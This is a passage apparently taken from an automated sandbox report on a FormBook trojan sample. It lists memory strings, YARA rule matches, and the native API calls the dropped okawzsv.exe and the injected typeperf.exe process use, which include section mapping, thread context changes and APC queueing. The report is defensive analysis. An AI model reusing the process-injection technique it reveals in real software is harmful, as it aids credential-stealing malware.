            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_lan
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land_h
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.lets-room.online&utm_medium=parking&utm
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.lets-room.online&amp;reg_source=parking_auto
            Source: typeperf.exe, 0000000B.00000002.3736723872.00000000044F4000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003B34000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040A063 NtGetContextThread,5_2_0040A063
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040A8A3 NtCreateSection,5_2_0040A8A3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040A273 NtSetContextThread,5_2_0040A273
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040AAC3 NtMapViewOfSection,5_2_0040AAC3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040B393 NtDelayExecution,5_2_0040B393
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004283B3 NtClose,5_2_004283B3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040ACF3 NtCreateFile,5_2_0040ACF3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040A483 NtResumeThread,5_2_0040A483
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00409E53 NtSuspendThread,5_2_00409E53
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040AF23 NtReadFile,5_2_0040AF23
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040B7B3 NtAllocateVirtualMemory,5_2_0040B7B3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2B60 NtClose,LdrInitializeThunk,5_2_00AA2B60
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00AA2C70
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_00AA2DF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA35C0 NtCreateMutant,LdrInitializeThunk,5_2_00AA35C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA4340 NtSetContextThread,5_2_00AA4340
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA4650 NtSuspendThread,5_2_00AA4650
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2AB0 NtWaitForSingleObject,5_2_00AA2AB0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2AF0 NtWriteFile,5_2_00AA2AF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2AD0 NtReadFile,5_2_00AA2AD0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2BA0 NtEnumerateValueKey,5_2_00AA2BA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2B80 NtQueryInformationFile,5_2_00AA2B80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2BE0 NtQueryValueKey,5_2_00AA2BE0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2BF0 NtAllocateVirtualMemory,5_2_00AA2BF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2CA0 NtQueryInformationToken,5_2_00AA2CA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2CF0 NtOpenProcess,5_2_00AA2CF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2CC0 NtQueryVirtualMemory,5_2_00AA2CC0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2C00 NtQueryInformationProcess,5_2_00AA2C00
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2C60 NtCreateKey,5_2_00AA2C60
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2DB0 NtEnumerateKey,5_2_00AA2DB0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2DD0 NtDelayExecution,5_2_00AA2DD0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2D30 NtUnmapViewOfSection,5_2_00AA2D30
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2D00 NtSetInformationFile,5_2_00AA2D00
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2D10 NtMapViewOfSection,5_2_00AA2D10
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2EA0 NtAdjustPrivilegesToken,5_2_00AA2EA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2E80 NtReadVirtualMemory,5_2_00AA2E80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2EE0 NtQueueApcThread,5_2_00AA2EE0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2E30 NtWriteVirtualMemory,5_2_00AA2E30
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2FA0 NtQuerySection,5_2_00AA2FA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2FB0 NtResumeThread,5_2_00AA2FB0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2F90 NtProtectVirtualMemory,5_2_00AA2F90
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2FE0 NtCreateFile,5_2_00AA2FE0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2F30 NtCreateSection,5_2_00AA2F30
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2F60 NtCreateProcessEx,5_2_00AA2F60
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA3090 NtSetValueKey,5_2_00AA3090
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA3010 NtOpenDirectoryObject,5_2_00AA3010
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA39B0 NtGetContextThread,5_2_00AA39B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA3D10 NtOpenProcessToken,5_2_00AA3D10
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA3D70 NtOpenThread,5_2_00AA3D70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03344340 NtSetContextThread,LdrInitializeThunk,11_2_03344340
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03344650 NtSuspendThread,LdrInitializeThunk,11_2_03344650
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342B60 NtClose,LdrInitializeThunk,11_2_03342B60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03342BA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03342BF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03342BE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342AF0 NtWriteFile,LdrInitializeThunk,11_2_03342AF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342AD0 NtReadFile,LdrInitializeThunk,11_2_03342AD0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342F30 NtCreateSection,LdrInitializeThunk,11_2_03342F30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342FB0 NtResumeThread,LdrInitializeThunk,11_2_03342FB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342FE0 NtCreateFile,LdrInitializeThunk,11_2_03342FE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03342E80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03342EE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03342D30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03342D10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03342DF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342DD0 NtDelayExecution,LdrInitializeThunk,11_2_03342DD0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03342C70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342C60 NtCreateKey,LdrInitializeThunk,11_2_03342C60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03342CA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033435C0 NtCreateMutant,LdrInitializeThunk,11_2_033435C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033439B0 NtGetContextThread,LdrInitializeThunk,11_2_033439B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342B80 NtQueryInformationFile,11_2_03342B80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342AB0 NtWaitForSingleObject,11_2_03342AB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342F60 NtCreateProcessEx,11_2_03342F60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342FA0 NtQuerySection,11_2_03342FA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342F90 NtProtectVirtualMemory,11_2_03342F90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342E30 NtWriteVirtualMemory,11_2_03342E30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342EA0 NtAdjustPrivilegesToken,11_2_03342EA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342D00 NtSetInformationFile,11_2_03342D00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342DB0 NtEnumerateKey,11_2_03342DB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342C00 NtQueryInformationProcess,11_2_03342C00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342CF0 NtOpenProcess,11_2_03342CF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342CC0 NtQueryVirtualMemory,11_2_03342CC0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03343010 NtOpenDirectoryObject,11_2_03343010
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03343090 NtSetValueKey,11_2_03343090
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03343D10 NtOpenProcessToken,11_2_03343D10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03343D70 NtOpenThread,11_2_03343D70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02945040 NtAllocateVirtualMemory,11_2_02945040
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02944E90 NtDeleteFile,11_2_02944E90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02944F10 NtClose,11_2_02944F10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02944CA0 NtCreateFile,11_2_02944CA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02944DD0 NtReadFile,11_2_02944DD0
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_004047D30_2_004047D3
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_004061D40_2_004061D4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004230D62_2_004230D6
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004139FC2_2_004139FC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004142492_2_00414249
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004252312_2_00425231
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00422B642_2_00422B64
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004173892_2_00417389
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004133B02_2_004133B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00416BBC2_2_00416BBC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004135082_2_00413508
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00423DF02_2_00423DF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004236482_2_00423648
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00412E592_2_00412E59
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_0041467E2_2_0041467E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00413E142_2_00413E14
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F08B72_2_004F08B7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F0B5A2_2_004F0B5A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004011405_2_00401140
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004101335_2_00410133
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004031855_2_00403185
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004031905_2_00403190
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040E1B15_2_0040E1B1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040E1B35_2_0040E1B3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004012705_2_00401270
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004163F35_2_004163F3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00402DD35_2_00402DD3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00402DE05_2_00402DE0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040FF135_2_0040FF13
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004027205_2_00402720
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0042A7235_2_0042A723
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B020005_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B301AA5_2_00B301AA
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B281CC5_2_00B281CC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A601005_2_00A60100
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0A1185_2_00B0A118
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF81585_2_00AF8158
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF02C05_2_00AF02C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B102745_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B303E65_2_00B303E6
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E3F05_2_00A7E3F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2A3525_2_00B2A352
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B1E4F65_2_00B1E4F6
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B224465_2_00B22446
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B305915_2_00B30591
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A705355_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8C6E05_2_00A8C6E0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6C7C05_2_00A6C7C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A707705_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A947505_2_00A94750
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A568B85_2_00A568B8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E8F05_2_00A9E8F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A728405_2_00A72840
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7A8405_2_00A7A840
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A05_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B3A9A65_2_00B3A9A6
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A869625_2_00A86962
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA805_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B26BD75_2_00B26BD7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2AB405_2_00B2AB40
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB55_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A60CF25_2_00A60CF2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70C005_2_00A70C00
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A88DBF5_2_00A88DBF
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6ADE05_2_00A6ADE0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7AD005_2_00A7AD00
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0CD1F5_2_00B0CD1F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2CE935_2_00B2CE93
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A82E905_2_00A82E90
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2EEDB5_2_00B2EEDB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2EE265_2_00B2EE26
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70E595_2_00A70E59
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEEFA05_2_00AEEFA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7CFE05_2_00A7CFE0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A62FC85_2_00A62FC8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AB2F285_2_00AB2F28
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A90F305_2_00A90F30
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE4F405_2_00AE4F40
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2F0E05_2_00B2F0E0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B270E95_2_00B270E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A770C05_2_00A770C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B1F0CC5_2_00B1F0CC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7B1B05_2_00A7B1B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA516C5_2_00AA516C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5F1725_2_00A5F172
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B3B16B5_2_00B3B16B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A752A05_2_00A752A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B112ED5_2_00B112ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8B2C05_2_00A8B2C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AB739A5_2_00AB739A
